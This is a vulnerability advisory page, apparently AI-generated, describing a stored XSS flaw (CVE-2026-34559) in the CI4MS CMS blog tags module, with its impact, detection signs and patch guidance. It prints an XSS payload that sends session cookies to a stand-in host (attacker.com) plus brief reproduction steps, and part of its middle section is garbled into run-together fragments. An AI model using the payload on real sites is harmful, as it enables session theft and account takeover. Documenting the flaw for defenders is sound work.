
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34559 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, affecting all versions up to and including 0.28.6.0. The flaw resides in the blog tags module, where user-controlled input is stored server-side without sanitization and later rendered unsafely across public tag pages and administrative interfaces. It was published on March 31, 2026, by researcher bugmithlegend and patched in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical) (Github Advisory, GitHub Security Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored/persistent XSS variant. The application performs no input sanitization or output encoding on the blog tag name field; values are stored directly in the database and later injected into page templates using unsafe DOM manipulation methods (e.g., .html(), innerHTML) without HTML entity encoding. An attacker with low-privilege access (sufficient to create or edit blog tags) can inject a JavaScript payload such as <img src=x onerror=alert(document.domain)> into the tag name field. The payload persists and executes automatically in the browsers of any user — including administrators — who views the affected endpoints (/backend/blogs/tags/ or /blog/{id}) (Github Advisory, GitHub Security Advisory).
Successful exploitation enables persistent execution of arbitrary JavaScript in the browsers of all users who view affected tag pages, including administrators. This can lead to full account takeover across all roles via session token theft, privilege escalation by targeting administrator sessions, unauthorized actions performed on behalf of victims, and redirection to malicious sites. The changed scope means the impact extends beyond the attacker's own session to affect the entire application and all its users (Github Advisory, GitHub Security Advisory).
A proof-of-concept (PoC) with step-by-step reproduction instructions and a video PoC are publicly available in the GitHub Security Advisory, demonstrating account takeover via the XSS payload (Github Advisory). The EPSS score is approximately 0.017–0.021%, indicating a low current probability of widespread exploitation. There is no evidence of active in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires only low-privilege access (e.g., a registered user who can create or edit blog tags), lowering the barrier for abuse.
<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> to exfiltrate session cookies, or <img src=x onerror=alert(document.domain)> for basic PoC validation./backend/blogs/tags/), create or edit a tag, and insert the XSS payload into the tag name field. Save the tag./blog/{id}) or the administrative tags interface will automatically execute the payload in their browser./backend/blogs/tags/ or /blog/{id} pages./backend/blogs/tags/ containing HTML/JavaScript tags (e.g., <img, <script, onerror=) in tag name parameters; repeated access to tag pages by unusual or new accounts shortly after tag creation.<img src=x onerror=...>) in the tag name field rather than plain text.The vendor has released a patch in version 0.31.0.0, which implements global input validation, enhanced CSRF token handling, and XSS protection across the application (GitHub Release). All users should upgrade to version 0.31.0.0 or later immediately. As interim mitigations, restrict blog tag creation and editing permissions to trusted administrators only, deploy a Web Application Firewall (WAF) with rules to detect and block common XSS payloads in input fields, and enforce HttpOnly and Secure flags on session cookies along with a strict Content Security Policy (CSP) header (Github Advisory).
The vulnerability was reported by researcher bugmithlegend and published by the CI4MS maintainer bertugfahriozer on March 31, 2026. Brief community mentions appeared on Mastodon and Bluesky shortly after disclosure, consistent with routine CVE notification activity. No significant vendor statements beyond the advisory or notable media coverage have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."